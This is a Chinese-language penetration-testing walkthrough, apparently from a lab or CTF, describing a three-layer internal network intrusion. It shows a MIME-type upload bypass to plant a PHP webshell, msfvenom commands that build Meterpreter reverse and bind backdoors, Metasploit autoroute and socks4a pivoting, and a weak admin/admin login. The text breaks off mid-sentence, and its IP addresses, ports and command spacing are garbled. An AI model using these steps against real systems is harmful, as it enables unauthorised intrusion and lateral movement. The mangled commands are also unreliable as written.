经测试可通过文件类型MIME绕过进行上传php脚本,上传成功后返回路径
访问返回的文件路径,成功连接到php大马
查看ip发现该主机是双网卡,第二层网络段为19..1.0/4
为进一步进行内网渗透,我们上传msf后门后门制作:
1.msfvenom-plinux/x64/meterpreter/reverse_tcpLHOST=19..31.07LPORT=SessionCommunicationTimeout=0SessionExpirationTimeout=0-felfshell.elf将后门上传到第一层主机19..31.07
设置msf监听
在第一层主机上运行shell.elf
Chmodshell.elf./shell.elf
msf获得meterpreter
将第一层的meterpreter切换到后台运行
1.background
利用第一层的meterpreter添加第二层的路由
1.runautoroute-s19..1.0/4
扫描发现第二层主机ip为19..1.
接着利用msf搭建socks代理,好让攻击机直接打第二层网络:
1.useauxiliary/server/socks4a
设置好代理后访问19..1.成功访问到网站
利用弱口令admin/admin登录到后台
在设置处发现可修改允许上传文件的类型,修改后保存设置
在撰写新文章处添加附件可直接上传php脚本
成功连接到php大马
为了打开第三层,我们需要在第二层主机上传msf后门制作后门:
msfvenom-plinux/x86/meterpreter/bind_tcpLPORT=-felfding.elf
利用大马上传,并在第二层主机上运行
chmodding.elf./ding.elf
设置msf相关配置
成功获取到第二层主机meterpreter
查看ip发现第三层网段为19...0/4
利用第二层主机的meterpreter添加第三层的网络路由
启用一个socks4a代理给第三层网络,端口设置为
然后在配置文件中加上
1.socks..31.119
利用获得的meterpreter发现第三层目标主机为19.16..
使用代理打开Firefox访问第三层主机ip19...通过测试发现